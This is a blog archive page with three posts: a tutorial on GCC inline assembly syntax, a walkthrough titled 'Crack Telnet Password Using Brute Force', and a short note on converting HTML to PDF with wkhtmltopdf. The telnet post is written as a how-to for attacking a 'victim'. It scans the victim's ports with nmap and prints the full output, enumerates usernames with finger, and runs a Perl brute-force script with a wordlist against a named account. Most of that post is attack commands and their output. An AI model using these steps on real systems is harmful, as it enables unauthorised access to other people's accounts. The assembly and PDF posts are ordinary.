PoiNtEr->: April 2012

                             Difference between a dream and an aim. A dream requires soundless sleep, whereas an aim requires sleepless efforts.

Search This Blog

Monday, April 16, 2012


We can instruct the compiler to insert the code of a function into the code of its callers, to the point where actually the call is to be made. Such functions are inline functions. Sounds similar to a Macro? Indeed there are similarities.
What is the benefit of inline functions?
This method of inlining reduces the function-call overhead. And if any of the actual argument values are constant, their known values may permit simplifications at compile time so that not all of the inline function’s code needs to be included. The effect on code size is less predictable, it depends on the particular case. To declare an inline function, we’ve to use the keyword inline in its declaration.
Inline assembly is important primarily because of its ability to operate and make its output visible on C variables. Because of this capability, "asm" works as an interface between the assembly instructions and the "C" program that contains it.
Programming Languages 

There are some things to note when using inline assembler in C program, firstly, most of C compiler uses the AT&T format, not the Intel format that most people are used to. In the AT&T format, the operands are reversed. If you use a register as an operand, prefix it with % and immediate values get a $. You also have to add a suffix to the instructions to specify the size of the operands.
movl %ecx, %ebx
Notice the 'l' at the end of mov. This specifies that the instruction is working on 32 bit operands. 'w' indicates that the instruction is using 16 bit operands and 'b' for 8 bit.
So, with all that under your belt, how do you actually add it into your code? You use the asm keyword. It takes the following form.
asm("instructions" : outputs : inputs : clobber list);
You don't actually need to use the last three, but for longer code you will need them. Let's see what they do.
asm volatile("
 pushl %%eax
 movl %1, %%eax
 movl %2, %%ebx
 addl %%ebx, %%eax
 movl %%eax, %0
 popl %%eax"
 : "=g" (i)
 : "g" (j), "g" (k)
 : "bx" );
Wow. Let's go through that piece of code step by step. The actual code, as you can probably figure out, adds j and k and puts the output in i. Firstly, what's with the '%%'? If you have any inputs or outputs, then you must put %% before your register names. Next up, the input list. Who is 'g'? G simply tells the compiler to put the argument anywhere. You can then reference them in order, %0 is i, %1 is j and %2 is k. '=g' tells the compiler that it is output. We put ebx into the clobbered list because it gets clobbered.

Clobber List

Some instructions clobber some hardware registers. We have to list those registers in the clobber-list, ie the field after the third ’:’ in the asm function. This is to inform gcc that we will use and modify them ourselves. So gcc will not assume that the values it loads into these registers will be valid. We shoudn’t list the input and output registers in this list. Because, gcc knows that "asm" uses them (because they are specified explicitly as constraints). If the instructions use any other registers, implicitly or explicitly (and the registers are not present either in input or in the output constraint list), then those registers have to be specified in the clobbered list.

Volatile ...?

If you are familiar with kernel sources or some beautiful code like that, you must have seen many functions declared as volatile or __volatile__ which follows an asm or __asm__. I mentioned earlier about the keywords asm and __asm__. So what is this volatile?
If our assembly statement must execute where we put it, (i.e. must not be moved out of a loop as an optimization), put the keyword volatile after asm and before the ()’s. So to keep it from moving, deleting and all, we declare it as
asm volatile ( ... : ... : ... : ...);
Use __volatile__ when we have to be verymuch careful.
If our assembly is just for doing some calculations and doesn’t have any side effects, it’s better not to use the keyword volatile. Avoiding it helps gcc in optimizing the code and making it more beautiful.

Example C Program:

//make value of b equal to value of a
int main(int argc,char *argv)
 int a=10, b;
asm volatile("movl %1, %%eax;movl %%eax, %0;":"=r"(b):"r"(a) :"%eax" );       

Tuesday, April 10, 2012

Crack Telnet Password Using Brute Force

First Install Zenmap on your ubuntu machine:
sudo apt-get install zenmap

Now open your terminal and use following command to check open ports on victim's system
now in gui prompt put the ip address of victim in target box.


Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-11 07:20 IST
NSE: Loaded 36 scripts for scanning.
Initiating ARP Ping Scan at 07:20
Scanning [1 port]
Completed ARP Ping Scan at 07:20, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:20
Completed Parallel DNS resolution of 1 host. at 07:20, 0.09s elapsed
Initiating SYN Stealth Scan at 07:20
Scanning [1000 ports]
Discovered open port 445/tcp on
Discovered open port 80/tcp on
Discovered open port 23/tcp on
Discovered open port 139/tcp on
Completed SYN Stealth Scan at 07:20, 2.70s elapsed (1000 total ports)
Initiating Service scan at 07:20
Scanning 4 services on
Completed Service scan at 07:20, 11.04s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against
Retrying OS detection (try #2) against
Retrying OS detection (try #3) against
Retrying OS detection (try #4) against
Retrying OS detection (try #5) against
NSE: Script scanning
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 07:21
Completed NSE at 07:21, 0.08s elapsed
NSE: Script Scanning completed.
Nmap scan report for
Host is up (0.0021s latency).
Not shown: 996 closed ports
23/tcp  open  telnet      Linux telnetd
80/tcp  open  http        Apache httpd 2.2.17 ((Ubuntu))
|_html-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:24:2B:DB:74:9F (Hon Hai Precision Ind.Co.)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:

Uptime guess: 0.011 days (since Wed Apr 11 07:05:17 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux

Host script results:
| nbstat:  
|   NetBIOS name: UMESH-VOSTRO151, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|   Names
|     UMESH-VOSTRO151<00>  Flags: <unique><active>
|     UMESH-VOSTRO151<03>  Flags: <unique><active>
|     UMESH-VOSTRO151<20>  Flags: <unique><active>
|     WORKGROUP<1e>        Flags: <group><active>
|_    WORKGROUP<00>        Flags: <group><active>
| smb-os-discovery:  
|   OS: Unix (Samba 3.5.8)
|   Name: Unknown\Unknown
|_  System time: 2012-04-11 07:21:12 UTC+5.5
|_smbv2-enabled: Server doesn't support SMBv2 protocol

1   2.10 ms

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.00 seconds
           Raw packets sent: 1134 (53.704KB) | Rcvd: 1076 (46.608KB)

Now Download following files and extract them:

Open a new Terminal and browse to extracted files and put following command in it:
To get the username use:
finger@ (ipaddress of victim)
umesh root

Now To brute-force run perl script with given parameters.
perl Telnet_Crack.pl -h -u umesh -P polish




it will take time and it depends on the strength of password that how long you have to wait to get the result.

Sunday, April 8, 2012

Convert HTML to PDF in Ubuntu

Convert HTML to PDF

First Install wkhtmltopdf on ubuntu:

sudo apt-get install wkhtmltopdf

Now Use following command to convert Html file to Pdf

wkhtmltopdf  filename.html filename.pdf

Viola!! that's it.